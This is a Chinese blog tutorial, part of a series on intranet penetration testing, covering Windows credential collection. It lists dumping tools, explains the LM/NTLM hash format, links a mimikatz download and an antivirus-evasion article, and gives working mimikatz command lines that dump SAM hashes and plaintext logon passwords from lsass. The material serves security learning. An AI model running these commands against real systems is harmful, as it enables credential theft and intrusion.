内网渗透之内网信息收集(五)

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

凭证信息收集

01凭证获取工具

02密码hash

03mimikatz

04get-hashs

内网渗透之内网信息收集(六)_不知名白帽的博客-CSDN博客


凭证信息收集

01凭证获取工具

常用来获取windows密码的工具

  1. mimikatz
  2. wce
  3. pwddump7
  4. ophcrack
  5. procdump+mimikatz
  6. lazagne

02密码hash

LM哈希&NTLM型哈希

winodws hash:

2000

xp

2003

Vista

win7

2008

2012

LM

NTLM

windows本地hash:

http://www.secpulse.com/archives/65256.html

windows系统下hash密码格式:

用户名称:RID:LM-HASH值:NT-HASH值

03mimikatz

mimikatz下载:

链接:https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg

提取码:jryu

非本地交互式凭证获取

mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

一般都是通过远程登陆靶机,在靶机内下载mimikatz

log result.txt(将结果传到txt中)

privilege::debug(提权)

token::elevate(模拟令牌:用于将权限提升为SYSTEM (默认)或在框中找到域管理员令牌)

获取到system用户的token

lsadump::sam(获得用户哈希)

sekurlsa::logonpasswords(获取明文密码)

mimikatz1.x版本:

privilege::debug //提升权限

inject::process lsass.exe sekurlsa.dll //注入sekurlsa.dll到lsass.exe进程里

@getLogonPasswords //获取密码

mimikatz免杀:

https://www.freebuf.com/articles/system/234365.html

04get-hashs

  • 31
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 35
    评论
评论 35
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知名白帽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值